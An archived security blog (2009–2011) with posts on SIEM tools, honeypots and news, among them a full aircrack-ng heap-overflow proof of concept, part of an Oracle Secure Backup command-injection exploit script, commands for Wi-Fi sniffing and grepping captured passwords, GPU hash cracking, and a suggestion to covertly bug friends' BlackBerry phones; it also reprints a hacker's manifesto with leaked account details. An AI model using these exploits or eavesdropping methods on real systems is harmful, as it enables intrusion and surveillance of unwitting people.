Greg Martin's blog - InfoSecurity 2.0

Wireless fun with your Macbook

2011-08-30T21:35:00.000-07:00

Since OSX Snow Leopard there is an Airport wireless API that allows some fun tricks but it takes some minor setup to use it properly...

First make sure you can easily run the new Airport API utility:

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport

Now you have easy ability to scan and sniff packets:

airport scan

And the sexiest feature is to dump packets in monitor mode:
sudo -s airport sniff 11

Note that you still cannot actively inject and sniff without using a realtek USB wifi card.

To stop the airport utility from sniffing drop it into the background and kill the process ID:

ctrl+z
then
sudo -s killall airport

So what kind of attacks are possible without injection? Well any wireless traffic (non encrypted via WEP/WPA/HTTPS) on the channel your sniffing you can then read with a packet inspection tool like tcpdump which comes by default on your Mac. A pcap will be saved in the /tmp directory, simply read it in with tcpdump to see what fun you captured!

Gregs-MacBook-Air:tmp gregmartin$ ls /tmp |grep air
airportSniffmcg8L2.cap

To print the ASCII content of all HTTP traffic:
tcpdump -s0 -Anr /tmp/airportSniffmcg8L2.cap port 80

or

tcpdump -s0 -Anr /tmp/airportSniffmcg8L2.cap port 80 |grep -i pass

Here we see an Android phone at the Boingo wireless captive portal ready to log in!

Of course you can use any libpcap tool such as Wireshark to analyze the resulting file.

Why you don't steal from a hacker

2011-08-12T07:36:00.000-07:00

So during the London riots I return home the next morning to find my flat ransacked and my Macbook Pro laptop stolen!
Police showed up, took a report and dusted for prints, performed typical forensics... One thing they did not expect was that I had installed the amazing open source tracking software from http://preyproject.com

Once I flagged my laptop as missing within Prey, I waited eagerly for the first report to come in. I was concerned he wouldn't be able to get past the login password but he was clever enough to add a new account: Here is how to create a new admin account on a Mac

Almost two weary days had gone by and I'm at dinner on a business trip in Luxembourg and I received an email which nearly knocked me out of my chair with excitement.

Next thing I did was buy a pack of smokes and run back to my hotel room so the games could begin... I cranked up the frequency of reports to one in every five minutes to try to get a screen capture of him using gmail or facebook so I could snag a name or login credentials.

After two hours hours of watching him surf religious revelation videos, shopping for Mercedes A class on autotrader he finally popped onto facebook! This was the treasure trove of information, at this point I had the following:

His Name: Sxxxxx Kxxxx
His School: xxxx School Class of 2009
His address: xxx N End Rd London W14
His IP Address: 90.201.72.xx
His ISP: BSKYB
His wireless AP: SKY378xx
His Facebook Page: https://www.facebook.com/profile.php?id=101952xxx

Of course I had pictures of him from the webcam on my Macbook as well as his Facebook page, now I just had to pass the info on to London Metro police and get to bed at a decent hour as I had to run an all-day meeting the following morning!

The tip of the iceberg, now that all the details were collected, London Metro police could make their move!

And the icing on the cake... justice served. Add me on twitter @gregcmartin lets laugh together!

ArcOSI 2.8 released

2011-04-11T23:12:00.000-07:00

Releasing a new and greatly enhanced version of ArcOSI tonight with the following new features:

Config file support
White listing
http and https proxy support
New feeds

Fixed numerous bugs and finally updated the Windows EXE version!

Snag a copy @ http://code.google.com/p/arcosi

Samsung Key Logger Mess

2011-03-31T07:48:00.000-07:00

So some brilliant writer for network world "Mohamed Hassan (CISSP)", reported based on his anti-virus tool having a false positive finding "Star Logger" key logger installed on his new Samsung Laptop. So the story quickly spread across the blogosphere including engadget and other high profile blogs then was amplified by twitter.

Apparently the AV he ran only looks for "c:\windows\SL" directory. What! This shows the terrible state of A/V software and how poor the detection signature actually can be. Seriously looking for the presence of a directory is extremely poor...

Will be interesting if Samsung sues anyone in this matter as this has not been positive PR for them. And all you blog slinging CISSP's need to slow your roll and stick to blogging about professional's research and not what your laptop's A/V client back.

Other fun A/V fail stories:
McAfee Kills Windows PC's by the thousands
Symantec Nukes Thousands of Chinese PC's

Sources:
http://www.f-secure.com/weblog/archives/00002133.html

Message from Comodo hacker

2011-03-27T17:58:00.000-07:00

This was copied from: http://pastebin.com/74KXCaEZ

Hello

I'm writing this to the world, so you'll know more about me..

At first I want to give some points, so you'll be sure I'm the hacker:

I hacked Comodo from InstantSSL.it, their CEO's e-mail address mfpenco@mfpenco.com
Their Comodo username/password was: user: gtadmin password: [trimmed]
Their DB name was: globaltrust and instantsslcms

GlobalTrust.it had a dll called TrustDLL.dll for handling Comodo requests, they had resellers and their url was:
http://www.globaltrust.it/reseller_admin/

Enough said, huh? Yes, enough said, someone who should know already knows...Am I right Mr. Abdulhayoglu?

Anyway, at first I should mention we have no relation to Iranian Cyber Army, we don't change DNSes, we

just hack and own.

I see Comodo CEO and others wrote that it was a managed attack, it was a planned attack, a group of

cyber criminals did it, etc. etc. etc.

Let me explain:

a) I'm not a group of hacker, I'm single hacker with experience of 1000 hackers, I'm single programmer with

experience of 1000 programmers, I'm single planner/project manager with experience of 1000 project

managers, so you are right, it's managed by a group of hackers, but it was only I with experience of 1000

hackers.

b) It was not really a managed hack. At first I decided to hack RSA algorithm, I did too much

investigation on SSL protocol, tried to find an algorithm for factoring integer, analyzed existing algorithms, for now I was not

able to do so, at least not yet, but I know it's not impossible and I'll prove it, anyway... I saw

that there is easier ways of doing it, like hacking a CA. I was looking to hack some CAs like Thawthe,

Verisign, Comodo, etc. I found some small vulnerabilities in their servers, but it wasn't enough to

gain access to server and sign my CSRs. During my search about InstantSSL of Comodo which signs CSRs immediately I found

InstantSSL.it which was doing it's job under control of Comodo.

After a little try, I analyzed their web server and easily (easy for me, so hard for others) I got FULL access on the server, after a little investigation on their

server, I found out that TrustDll.dll takes care of signing. It was coded in C# (ASP.NET).

I decompiled the DLL and I found username/password of their GeoTrust and Comodo reseller account.

GeoTrust reseller URL was not working, it was in ADTP.cs. Then I found out their Comodo account works

and Comodo URL is active. I logged into Comodo account and I saw I have right of signing using APIs. I

had no idea of APIs and how it works. I wrote a code for signing my CSRs using POST request to those

APIs, I learned their APIs so FAST and their TrustDLL.DLL was too old and was not working properly, it doesn't send all needed parameters,

it wasn't enough for signing a CSR. As I said, I rewrote the code for !AutoApplySSL and !PickUpSSL
APIs, first API returns OrderID of placed Order and second API returns entire signed

certificate if you pass OrderID from previous call. I learned all these stuff, re-wrote the code and

generated CSR for those sites all in about 10-15 minutes. I wasn't ready for these type of APIs, these

type of CSR generation, API calling, etc. But I did it very very fast.

Anyway, I know you are really shocked about my knowledge, my skill, my speed, my expertise and entire attack.

That's OK, all of it was so easy for me, I did more important things I can't talk about, so if you have to

worry, you can worry... I should mention my age is 21

Let's back to reason of posting this message.

I'm talking to the world, so listen carefully:

When USA and Israel creates Stuxnet, nobody talks about it, nobody blamed, nothing happened at all,

so when I sign certificates nothing should happen, I say that, when I sign certificates nothing should

happen. It's a simple deal.

I heard that some stupids tried to ask about it from Iran's ambassador in UN, really? How smartass you are?
Where were you when Stuxnet created by Israel and USA with millions of dollar budget, with access to SCADA systems and Nuclear softwares? Why no one asked a question from Israel and USA ambassador to UN?
So you can't ask about SSL situtation from my ambassador, I answer your question about situtation: "Ask about Stuxnet from USA and Israel", this is your answer, so don't waste my Iran's ambassador's worthy time.

When USA and Isrel can read my emails in Yahoo, Hotmail, Skype, Gmail, etc. without any simple

little problem, when they can spy using Echelon, I can do anything I can. It's a simple rule. You do,

I do, that's all. You stop, I don't stop. It's a rule, rule #1 (My Rules as I rule to internet, you should know it

already...)

Rule#2: So why all the world worried, internet shocked and all writers write about it, but nobody

writes about Stuxnet anymore? Nobody writes about HAARP, nobody writes about Echelon... So nobody

should write about SSL certificates.

Rule#3: Anyone inside Iran with problems, from fake green movement to all MKO members and two faced

terrorists, should afraid of me personally. I won't let anyone inside Iran, harm people of Iran, harm

my country's Nuclear Scientists, harm my Leader (which nobody can), harm my President, as I live, you

won't be able to do so. as I live, you don't have privacy in internet, you don't have security in

digital world, just wait and see...By the way, you already have seen it or you are blind, is there any larger target than a CA in internet?

Rule#4: Comodo and other CAs in the world: Never think you are safe, never think you can rule the

internet, ruling the world with a 256 digit number which nobody can find it's 2 prime factors (you think so), I'll show

you how someone in my age can rule the digital world, how your assumptions are wrong, you already understood it, huh?

Rule#5: To microsoft, mozilla and chrome who updated their softwares as soon as instructions came from

CIA. You are my targets too. Why Stuxnet's Printer vulnerability patched after 2 years? Because it was

needed in Stuxnet? So you'll learn sometimes you have to close your eyes on some stuff in internet,

you'll learn... You'll understand... I'll bring equality in internet. My orders will equal to CIA orders,

lol ;)

Rule#6: I'm a GHOST

Rule#7: I'm unstoppable, so afraid if you should afraid, worry if you should worry.

My message to people who have problem with Islamic Republic of Iran, SSL and RSA certificates are broken, I did it one time, make sure I'll do it again, but this time nobody will notice it.
I see some people suggests using VPNs, some people suggests TOR, some other suggests UltraSurf, etc. Are you sure you are safe using those? RSA 2048 was not able to resist in front of me, do you think UltraSurf can?

If you was doing a dirty business in internet inside Iran, I suggest you to quit your job, listen to sound of most of people of Iran, otherwise you'll be in a big trouble, also you can leave digital world
and return to using abacus.

A message in Persian: Janam Fadaye Rahbar

[UPDATE 1]: Also check this: http://pastebin.com/DBDqm6Km

Webinar: Integrating Open Source Intelligence with ArcOSI

2011-02-22T06:15:00.000-08:00

Join me today for a webinar of how integrating Open Source Intelligence within ArcSight ESM using ArcOSI.

If you would like to register: http://www.arcsight.com/webinars/watch/integrating-open-source-intelligence-osint/

Topics we will cover:

What is OSINT and how has it become a powerful SIEM use cases for 2011. The following webinar will cover:
• Why A/V does not cut it anymore
• How to detect the new threat: APT, client-side, malware
• What OSINT is
• An introduction to ArcSight Open Source Intelligence (ArcOSI)

ArcOSI 2.1 Released!

2011-01-13T13:56:00.000-08:00

Just uploaded the newest version of ArcOSI Open Source Intelligence Utility for use with ArcSight ESM. I've added several new malware domain feeds and improved the code to handle connection errors, etc. I'm making time for this project now and will soon add support very soon for proxy and proxy-auth as this has been requested numerous times!

Thanks to everyone who has tested and just a reminder feel free to reach out directly if you have any issues, feedback or requests.

http://code.google.com/p/arcosi

-Greg

Look out

2010-10-25T16:07:00.000-07:00

got Metasploit running on my iphone4 after a few tweaks..

Security B-Sides DFW Nov 6th

2010-10-18T09:41:00.000-07:00

The very first B-Sides security conference in Dallas, TX is coming up Nov 6th and I will present early morning on mass exploitation using Metasploit a cucumber and an iPhone.

Please bring your friends and co-workers who are interested in Security as these conferences are completely free and typically loads of fun.

Hope to see you there, cheers.

http://www.securitybsides.org/BSidesDFW

Amun Honeypot with ArcSight CEF support

2010-09-06T17:00:00.000-07:00

Playing around this weekend and created a CEF syslog output plugin for Amun honeypot, here is the sample output (dst IP scrubbed):

Sep 6 19:44:30 honeypot1 Amun[32438]: CEF:0|Alchemy Security|Amun|8.0|100|Honeypot Intercepted Malware|src=222.186.27.82,dst=76.78.17.74,msg=DCOM Vulnerability,dpt=135,cs1=None
Sep 6 20:10:46 honeypot1 Amun[32438]: CEF:0|Alchemy Security|Amun|8.0|100|Honeypot Intercepted Malware|src=66.127.110.254,dst=76.78.17.74,msg=NETBIOSNAME Vulnerability,dpt=139,cs1=None
Sep 6 20:10:46 honeypot1 Amun[32438]: CEF:0|Alchemy Security|Amun|8.0|100|Honeypot Intercepted Malware|src=66.127.110.254,dst=76.78.17.74,msg=NETBIOSNAME Vulnerability,dpt=139,cs1=None
Sep 6 20:10:46 honeypot1 Amun[32438]: CEF:0|Alchemy Security|Amun|8.0|100|Honeypot Intercepted Malware|src=66.127.110.254,dst=76.78.17.74,msg=NETBIOSNAME Vulnerability,dpt=139,cs1=None
Sep 6 20:10:46 honeypot1 Amun[32438]: CEF:0|Alchemy Security|Amun|8.0|100|Honeypot Intercepted Malware|src=66.127.110.254,dst=76.78.17.74,msg=NETBIOSNAME Vulnerability,dpt=139,cs1=None

Now need to feed these into an ESM active list...

To be nice, I packaged up the CEF enabled Amun honeypot into a 200MB Ubuntu VM so you can try this out in your ArcSight lab or production. Follow the easy directions to re-IP and setup syslog out. You will be nabbing attackers and the latest malware in no time!

***update: I Googled the attacker IP's in the post above and found no mention of them in any open malicious IP lists, this highlights the effectiveness of using honeypots to gather the absolute latest intelligence on hosts attacking your perimeter (and others).

***update 2: VM boot issue fixed, sorry about that!

MIT Courseware: Learn to program in Python

2010-08-28T08:25:00.000-07:00

Just wanted to share this excellent resource as I have been mentoring new security professionals and a majority of them have never written a script before. Open course ware is one of the greatest things to come out in recent years and I understand this is one of the best intro programing lectures:

http://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-00-introduction-to-computer-science-and-programming-fall-2008/lecture-videos/

ArcOSI - ArcSight Open Source Intelligence

2010-08-12T16:09:00.000-07:00

Just in time for the ArcSight annual users conference I will be presenting on integrating Open Source Intelligence in ESM and have updated the original malwarefeed.py script with a version which can pull from multiple configurable sources!

If you want to give it a spin on your own environment now, download the python script version below and start streaming thousands of known malicious IP's right into ESM via CEF syslog.

http://code.google.com/p/arcosi/

usage: ./arcosi.py 127.0.0.1

New 13" Macbook Pro GPU Hash Cracking NTLM/MD5/SHA1

2010-05-13T14:02:00.000-07:00

Wanted give some GPU cracking a go on my new 13" Macbook Pro. It's sporting a nice but rather weak Nvidia Geforce 330m.

If you want to try the same, you will need the CUDA libraries here, and CUDA Multiforcer for Intel Mac's located here.

Remember to check out Pyrit here for cracking WPA/WPA2 keys, it will also run on OSX...

./CUDA-Multiforcer -h NTLM -c charsets/charsetfull -f test_hash_files/Hashes-NTLM-Full.txt --min=4 --max=9

Benchmark:

Cryptohaze.com CUDA Multiforcer (multiple hash brute forcer)
by Bitweasil
Version 0.61 beta, length 0-14
Currently supported hash types: MD5 MD4 NTLM
Hash type: NTLM
CUDA Device Information:
Device 0: "GeForce 320M"
Number of cores: 48
Clock rate: 0.00 GHz
Charset loaded (96 characters)
Hashes loaded (7 hashes)
Launching kernel for password length 4
Done: 73.49% Step rate: 82.9M/s Search rate: 580.4M/sec

------------------------------------------

Compute done: Reference time 1.3 seconds
Stepping rate: 63.1M MD4/s
Search rate: 441.8M NTLM/s

Launching kernel for password length 5
Done: 25.36% Step rate: 80.4M/s Search rate: 562.6M/sec

BlackBerry Evil

2010-04-28T14:51:00.000-07:00

Asian security researcher known as "chopstick", released PhoneSnoop a freely available blackberry app that if installed will allow a remote computer to covertly call the blackberry, activate the speakerphone feature and allow remote audio bugging! Now this nasty little app was released at the Hack-n-a-Box security conference in Malaysia last October. It recently has shaken up government organizations such as US-CERT to issue warnings.

Remember in the news when President Obama had to fight to keep his blackberry after the election? This is a serious threat so try it out on your friends and get back to me.

Download it here and documentation here

A potential fix for enterprise blackberry users would be to deny "Input Simulation" option on the BES server.

Aircrack-NG remote exploit code

2010-04-14T14:21:00.001-07:00

# Title: Remote Exploit Against the Aircrack-NG Tools svn r1675
# EDB-ID: 12217
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Lukas Lueg
# Published: 2010-04-14
# Verified: no
# Download Exploit Code
# Download N/A

view source
print?
#!/usr/bin/env python
# -*- coding: UTF-8 -*-

''' A remote-exploit against the aircrack-ng tools. Tested up to svn r1675.

The tools' code responsible for parsing IEEE802.11-packets assumes the
self-proclaimed length of a EAPOL-packet to be correct and never to exceed
a (arbitrary) maximum size of 256 bytes for packets that are part of the
EAPOL-authentication. We can exploit this by letting the code parse packets
which:
a) proclaim to be larger than they really are, possibly causing the code
to read from invalid memory locations while copying the packet;
b) really do exceed the maximum size allowed and overflow data structures
allocated on the heap, overwriting libc's allocation-related
structures. This causes heap-corruption.

Both problems lead either to a SIGSEGV or a SIGABRT, depending on the code-
path. Careful layout of the packet's content can even possibly alter the
instruction-flow through the already well known heap-corruption paths
in libc. Playing with the proclaimed length of the EAPOL-packet and the
size and content of the packet's padding immediately end up in various
assertion errors during calls to free(). This reveals the possibility to
gain control over $EIP.

Given that we have plenty of room for payload and that the tools are
usually executed with root-privileges, we should be able to have a
single-packet-own-everything exploit at our hands. As the attacker can
cause the various tools to do memory-allocations at his will (through
faking the appearance of previously unknown clients), the resulting
exploit-code should have a high probability of success.

The demonstration-code below requires Scapy >= 2.x and Pyrit >= 0.3.1-dev
r238 to work. It generates pcap-file with single packet of the following
content:

0801000000DEADC0DE0000DEADC0DE010000000000000000AAAA03000000888E0103FDE8FE0
108000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000043616E20492068617320736F6D65206D6F6172
3F

03/27/2010, Lukas Lueg, lukas.lueg@gmail.com
'''

import cpyrit.pckttools
import scapy.layers

# A IEEE802.11-packet with LLC- and SNAP-header, looking like the second
# phase of a EAPOL-handshake (the confirmation). The size set in the EAPOL-
# packet will cause an overflow of the "eapol"-field in struct WPA_ST_info and
# struct WPA_hdsk.
# We have plenty of room for exploit-payload as most of the fields in the
# EAPOL_Key-packet are not interpreted. As far as I can see, the adjacent
# heap structure will be overwritten by the value of EAPOL_WPAKey.Nonce in
# case of airodump-ng...
pckt = scapy.layers.dot11.Dot11(addr1='00:de:ad:c0:de:00', \
addr2='00:de:ad:c0:de:01', \
FCfield='to-DS') \
/ scapy.layers.dot11.LLC() \
/ scapy.layers.dot11.SNAP() \
/ scapy.layers.l2.EAPOL(len=65000) \
/ cpyrit.pckttools.EAPOL_Key() \
/ cpyrit.pckttools.EAPOL_WPAKey(KeyInfo = 'pairwise+mic') \
/ scapy.packet.Padding(load='Can I has some moar?')

if __name__ == '__main__':
print "Packet's content:"
print ''.join("%02X" % ord(c) for c in str(pckt))
filename = 'aircrackng_exploit.cap'
print "Writing to '%s'" % filename
writer = cpyrit.pckttools.Dot11PacketWriter(filename)
writer.write(pckt)
writer.close()
print 'Done'

Getting Synced

2010-03-25T09:16:00.000-07:00

I have a personal Gmail account which activesync's Contacts, Mail and Personal Calendar. Problem is I have two other seperate work related calendars on a different system and they don't sync to my phone.

The first is my business Google Apps account where I receive lots of Calendar invites next I have my work laptop Outlook account which is critical but only while I am in this client's engagement.

So with all these various data sources I thought it may be too difficult to patch together all the Calendar and event sources into my single wimpy iPhone. It really wasn't that hard at all, read on:

Personal Gmail - Outlook Active Sync to "m.google.com" (Sync Calendar, Contacts, Mail)

story: When Jess quit her job to move to a competitor she gave me a heads up about the company taking her blackberry, within 15 minutes and while driving :) we set her BB to bi-direction sync (just type m.google.com into the BB browser and download app over the air). We then removed the sync app, wiped her contacts from the phone and repeat the process to pull down contacts onto her new BB. If you ever stress about losing your phone and contacts this is your best solution regardless of your phone choice.

Work Google Apps Account - This is standard IMAP connection to my iPhone, and an additional CalDAV account for syncing the additional calendar! This I did not think was possible until doing some research.

Client Outlook Account - Download the Windows Google Sync utility and set it up to PUSH from Outlook TO one of your Gmail accounts already on your phone, pick the one with the most potential conflicts then you can pull it up in the browser and re-arrange/re-schedule.

That's it, I will hopefully never be late to another meeting again! (yea right)

VMWare Fusion and OSX FileVault encryption

2010-02-23T14:27:00.000-08:00

VMWare Fusion consistently having performance problems for me of late. I've cursed their name and thought ah well I will switch to Virtual Box or Parallels some time in the future. Just today it occurred to me that the default VM storage directory is within /User/Username home directory!

Why is that significant? I have (like many Mac wielding infosec folk) FileVault home folder encryption enabled, this combined with the option to encrypt swap memory enables obviously cripples the performance of resource intensive Virtualization.

The simple solution is to relocate the VM directories out of your home directory for example:

#sudo -s
#mkdir /vmware
#mv /User/Username/Documents/Virtual\ Machines.localized/ /vmware
#chown -R username:staff /vmware

*** Update *** this more than quadruples the speed of your VM's if you have filevault on.

Barnyard2 the NEW Snort output processor

2009-12-14T13:14:00.000-08:00

Sadly there are few who know about the excellent continuation of the original and stale but popular Barnyard code.

The great guys who manage Securix Live and NSM Now! Opensource projects have taken on updating and improving on the original Barnyard code.

Some of the new features are bug fixes, Unified2 support, support of Snort 2.8.5.1 and a slew of output plugins (mysql,postgres,syslog,cef,tcpdump,prelude,etc)

If you are a user of the old Barnyard code for high performance Snort log processing then I very highly recommend you give Barnyard2 a spin...

Download here:
http://www.securixlive.com/barnyard2/download.php

Arcsight Unified Windows Connector de-mystified

2009-12-09T07:05:00.000-08:00

As I'm now full-time consulting for Arcsight , I figured this would be a good place to share some of the black magic knowledge that may help others be successful… A great first topic to jump into is the Windows Unified Connector.

This will require you to have some basic-advanced Arcsight administration experience but hopefully it's easy for anyone to understand.

Windows Unified is one of the heaviest utilized connectors but is also one of the most troublesome to understand. Hopefully this post will give you a better idea how it works and how to properly troubleshoot and tune it.

WHY:

Windows Event logs have a wealth of security information, especially on the domain controllers. Who logged on/off, who changed user or file permissions, etc.

HOW:

Windows Unified is a polling Connector which at regular intervals connects to each specified Windows Server, authenticates and grabs a copy of the latest event logs via WMI (Windows API) to normalize and forward to Arcsight ESM.

ISSUES:

Event Latency

There are several common issues experienced using the Windows Unified Connector. Perhaps the most prevalent is delayed events. It is possible to have a Windows Unified Connector sending events to ESM hours or even days late, obviously this kills your ability to do real-time correlation along with anything else really.

Limiting Connectors. A client recently had two separate connectors one production and one running remotely as backup both configured the same and actively polling the same Windows machines. This means the Windows hosts are getting hammered with double duty polling. It's a must to only poll from one Connector at a time and to obtain a backup site, simply add a new ESM destination from the production Connector to also forward events to the backup ESM. In your Disaster Recovery plan have a procedure for quickly turning up the Connector on the backup network to take over during a failure.

Device Profiling

The biggest offender of latency is grouping, the way the Unified Connector works, it polls all systems with the same frequency for the same number of events. This can lead to serious event delay and backlog if you are polling high event rate servers and low event rate servers on the same Connector.

Create multiple Unified Windows Connectors and group the high event rate systems on one or several Connectors and leave the low event rate systems on another. This is a key to eliminating event latency.

Finally there are a few knobs which allow you to tune both polling frequency and number of events fetched at a time.

eventpollcount=50

50 is the default but it would not hurt to bump this value up on your high event rate Connector.

sleeptime=-1

This value controls how long in seconds to wait until the next event poll. -1 the default means continuously poll without delay. On a slow network or polling over long WAN or VPN links, it makes since to add sleeptime, start with 20 seconds and work your way up until you find the right setting for your network.

Connection Issues

Windows Unified Conenctor uses CIFS connection via RPC TCP/445, make sure the RPC service is turned on and is not firewalled to or from the Unified Connector's IP.

Unable to open RPC Handler, if you see this in your Connector logs, it means the remote machine cannot be reached, it's down or authentication is failing. Start with ping, then telnet to port 445 from the Connector finally check login credentials.

Infosec Monkeys

2009-11-20T09:28:00.001-08:00

Ran across this old gem of a post and wanted to archive it here as it's a classic.

From: Linus Torvalds torvalds@linux-foundation.org
Subject: Re: [stable] Linux 2.6.25.10
Newsgroups: gmane.linux.kernel
Date: 2008-07-15 16:13:03 GMT (1 year, 18 weeks, 1 day, 19 hours and 16 minutes ago)

On Tue, 15 Jul 2008, Linus Torvalds wrote:
>
> So as far as I'm concerned, "disclosing" is the fixing of the bug. It's
> the "look at the source" approach.

Btw, and you may not like this, since you are so focused on security, one
reason I refuse to bother with the whole security circus is that I think
it glorifies - and thus encourages - the wrong behavior.

It makes "heroes" out of security people, as if the people who don't just
fix normal bugs aren't as important.

In fact, all the boring normal bugs are _way_ more important, just because
there's a lot more of them. I don't think some spectacular security hole
should be glorified or cared about as being any more "special" than a
random spectacular crash due to bad locking.

Security people are often the black-and-white kind of people that I can't
stand. I think the OpenBSD crowd is a bunch of masturbating monkeys, in
that they make such a big deal about concentrating on security to the
point where they pretty much admit that nothing else matters to them.

To me, security is important. But it's no less important than everything
*else* that is also important!

Linus

The HTTPS security problem

2009-11-04T10:18:00.000-08:00

Writing IDS and IPS signatures for web application targeted exploits is usually a straight forward process. Unfortunately as products attempt to be more secure via forcing SSL for transactions makes detection much more complex.

Take this recent exploit released on Milw0rm targeting Oracle Secure Backup Server for example...

It's a simple bash script using curl to post the malicious payload:

( snip )

TARGET=$1

#Exploiting CVE-2009-1977 and getting a valid token
echo "[+] Exploiting CVE-2009-1977 against $TARGET"
postdata="button=Login&attempt=1&mode=&tab=&uname=--fakeoption&passwd=fakepwd"
session=`curl -kis "https://$TARGET/login.php" -d $postdata | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1`

if [[ -z $session ]]
then
echo "[!] Fatal error. No valid token has been retrieved"
exit
fi

echo "[+] I got a valid token: $session"

#Use a valid session and CVE-2009-1978 in order to inject arbitrary commands
echo "[+] Exploiting CVE-2009-1978 against $TARGET"
shell="1%26ver>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
check=`curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft`

( /snip )

The issue is that the payload uri cannot be string matched using tradition IDS/IPS without either running Snort on the product itself or decoding SSL in realtime.

Well what if the product vendor (as most do) bundle a self signed certificate and don't give you access to the SSL keys to decrypt? What if your organization (as most do) simply ignore SSL streams with their IDS/IPS product.

This really hampers defense and raises the issues that HTTPS is going to be the primary target of attackers from now on to simply bypass prevention and detection all together.

How has your organization dealt with this issue? Have you even discussed it yet?

Snort has an SSL/TLS pre-processor but does it decode live SSL for you? It does not at all and only validates/inspects the SSL/TLS handshake and protocol and some basic attacks.

In fact from the current Snort documentation:

Encrypted traffic should be ignored by Snort for both performance reasons and to reduce false positives.

This is a problem the industry needs a real solution for.

Importing Known Malware IP's to Arcsight ESM

2009-10-22T15:14:00.000-07:00

Wanted to share this proof of concept script I wrote to test out Arcsight's Common Event Format (CEF).

Essentially it grabs the latest list of known malware/bot IP's from SRI's Malware Threat Center and excellent resource for tracking malicious domains and spits them out to Arcsight via CEF Syslog.

Downloads:

malwarefeed.py

Denial of Service vulnerability in Snort 2.8.1 - 2.8.5 beta

2009-10-22T15:13:00.000-07:00

Advisory:
=========
Snort unified 1 IDS Logging Alert Evasion, Logfile Corruption/Alert Falsify

Log:
====
30/06/2009 Bug detected.
20/07/2009 First mail with snort team.
20/07/2009 Snort team answer they will fix it in the next release (2.8.5).
16/09/2009 Snort release, bug fixed.

Affected Versions:
==================
snort-2.8.1
snort-2.8.2
snort-2.8.3
snort-2.8.4
snort-2.8.5.beta*

link: http://pablo-secdev.blogspot.com/2009/09/snort-28-285stable-unified1-output-bug.html
poc: http://milw0rm.com/sploits/2009-snort-unified1_bug.tar.gz

Securing LAMP video

2009-10-19T17:28:00.000-07:00

Stumbled accross this screencast I made for my buddies at Firehost a couple of months back. Was my first screencast and didn't go so terrible :)

Goes over some of the basics for setting up a secure Ubuntu+Apache+PHP server...

American Airlines now has in flight Wifi

2009-10-06T07:12:00.000-07:00

American now has Wifi access on select planes, including 747 and MD-80's. Fees are $9.95 US for an all day pass and are currently running a free promotion for first time users.

The free promo requires registering an account using only an email address and code which they provide, no credit card is required. This means you can probably sign up using multiple email accounts and username for as long as the promo lasts.

When you sign up it assures you that the system is very secure and tested thoroughly by the FAA, the captive portal authentication is SSL based but after authenticating you are still vulnerable to any standard wireless man in the middle attack as there is no WEP, WPA or VPN protection.

Setting my radio to monitor mode quickly showed everyone's traffic on the flight, so security is non-existent at best.

Speeds were very good, similar to DSL connection but lots of intermittent latency made video streaming from Hulu unwatchable.

Here is a screen grab of an in-flight speed test.

9 Percent Of Enterprise Machines Infected With Malware

2009-09-30T07:44:00.000-07:00

New study released from 3 months of botnet research found that up to 9% of large enterprise organizations are infected and active bot nodes.

This is not surprising and shows the importance of having both internal IDS sensors such as Snort IDS (with Emerging Threats Signature set) and a consolidated logging and event management product (SIEM tools) such as Arcsight.

A large client can leverage SIM to monitor windows event logs, host based ID(P)S and or anti-virus software. With the combined information, companies can leverage strong correlation reports matching those events with the internal IDS sensors. This seems to be a best practice approach at containing sprawling infections such as Conficker, Koobface and even the nasty Zeus (keylogging) malware.

Original article @ Dark Reading:
http://www.darkreading.com/insiderthreat/security/client/showArticle.jhtml?articleID=220200118

Texas Stadium powered by Microsoft

2009-09-15T19:25:00.000-07:00

Note to embedded systems and product developers: Avoid Windows.

Apple's secret security updates

2009-08-27T09:49:00.000-07:00

So with the release of OSX Snow Leopard on Friday Apple has included several new and almost lackluster features such as full 64bit applications, better multi-core support and the OpenCL library which will give CUDA like GPU access to applications. One of the most interesting new features which was slipped in secretly was transparent malware scanning.

This new OSX service scans all new files, emails and links that are processed for malcode using binary pattern matching signatures. This is interesting and great new feature for security but why is it a secret? Apparently Apple doesn't want to tarnish the reputation of running a Mac is a worry free utopia with no exploits, worms or trojans. While we do know that's not entirely true it's great they are integrating new security features to maintain that status.

Just odd that they didn't tell anyone.

Network Solutions hacked, 500,000 card numbers compromised

2009-07-27T12:18:00.000-07:00

Another major data breach this time Network Solutions which offers security products such as SSL certificates is the latest to be compromised at the tune of 500,000+ credit/debit cards.

This attack seemed to be very sophisticated and the company claims the had maintained PCI compliance during the time of the hack. This is a huge one for the industry as it will spark a huge PCI works/doesn't work debate and it's perfectly timed as industry conferences BlackHat and Defcon start in Las Vegas this week.

References:

Washington Post

Finextra
SC Magazine

New MS 0-day ActiveX (MSVidCtl dll exploit)

2009-07-06T07:36:00.000-07:00

This was just announced this morning and was found in the wild on several Chinese forums. Apparently this has been rampant for almost a month undetected.

This is a client side (browser) exploit, so visiting a malicious site will result in infection.

There is one known hotfix and that is to set a "kill bit" in the registry for the ActiveX component.

* Create a registry key called:

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]

Then, create a dword value named "Compatibility Flags" and give it a value of 400.

Here are the current Snort IDS/IPS signatures for this exploit:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MSVidCtl 0-day"; flow: to_server, established; uricontent:"/aa/go.jpg"; nocase; classtype: attempted-admin; reference:URL,isc.sans.org/diary.html?storyid=6733; sid: 3000305; rev: 2;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET
CURRENT_EVENTS Likely MSVIDCTL.dll exploit in transit";
flow:to_client,established; content:"|00 03 00 00 11 20 34|";
content:"|ff ff ff ff 0c 0c 0c 0c 00|"; within:70;
classtype:trojan-activity; sid:2009493; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET
CURRENT_EVENTS Vulnerable Microsoft DirectShow ActiveX Load";
flow:to_client,established; content:"clsid"; nocase;
